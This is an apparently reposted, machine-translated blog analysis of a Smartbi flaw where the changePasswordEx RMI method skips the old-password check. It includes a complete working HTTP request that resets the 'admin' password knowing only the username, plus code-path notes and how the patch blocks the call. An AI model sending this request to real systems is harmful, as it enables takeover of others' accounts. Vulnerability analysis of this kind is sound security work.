Smartbi modify user password vulnerability

News 2023-08-16 03:15:43 views: null

Vulnerability Profile

By checking the patch package information of Smartbi, it is found that there is a vulnerability to modify the user's password under certain circumstances, and perform simple reproduction and analysis

image

Vulnerability recurrence

When changing the password on the page, you need to know the password corresponding to the original user

image

image

image

Directly constructing such a data packet, you don’t need to know the original password, and you can change the password if you know the user name

POST /smartbi/vision/RMIServlet HTTP/1.1
Host: 192.168.222.133:18080
Content-Length: 73
Cache-Control: max-age=0
If-Modified-Since: 0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Origin: http://192.168.222.133:18080
Referer: http://192.168.222.133:18080/smartbi/vision/index.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=4A4AC06EC1DF3CDDC45239C211926FA1
Connection: close

className=UserService&methodName=changePasswordEx&params=["admin","","1"]

image​​image

Vulnerability Analysis

smartbi.usermanager.ILocalUserManagerModule#changePasswordEx

image

smartbi.usermanager.UserManagerModule#changePasswordEx

imageAlthough the operation of changing the password obtains the new password after changing the original password of the user name, but does not perform any verification processing on the original password

‍Help cybersecurity study, get a full set of information S letter for free:
① Mind map of cybersecurity learning growth path
② 60+ classic cybersecurity toolkits
③ 100+ SRC analysis reports
④ 150+ e-books on cybersecurity attack and defense combat techniques
⑤ The most authoritative CISSP Certification Exam Guide + Question Bank
⑥ More than 1800 pages of CTF Practical Skills Manual
⑦ Collection of the latest interview questions from network security companies (including answers)
⑧ APP Client Security Testing Guide (Android+IOS)

userId is queried based on the incoming username

smartbi.usermanager.UserManagerModule#updateUserEx

imagesmartbi.usermanager.UserManagerModule#updateUserExtend

image

Bug fixes

After uploading the patch package and then sending the data packet, it was found that it was intercepted

image

image

image

Execution ends when the corresponding class name and method are matched

Guess you like

Origin blog.csdn.net/qq_38154820/article/details/132302735
Recommended
Ranking
Empire cms smart tag calls four first-level recommended articles, starting from the fourth article
Linux environment installation and configuration Elasticsearch7.17
Big Data processing architecture and Lambda Kappa architecture
Explore the top of the AI large model platform - Wenxin Qianfan
Beijing car PK10 lucky airship Guanya size and value of the odd and even tips
W3B x Sui Hacker House|In-depth understanding of Sui and Move language
Know almost Ko Chan: Chinese what any decent open source software products? (Finishing from my original answer)
Comprehensively improve AD domain security authentication | Zhuyun IDaaS
Android Update Engine Analysis (24) What happened when making the downgrade package?
Spark Architecture and Operating Mechanism (1) - System Architecture
Daily
More
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)

Code World

© 2018 codetd.com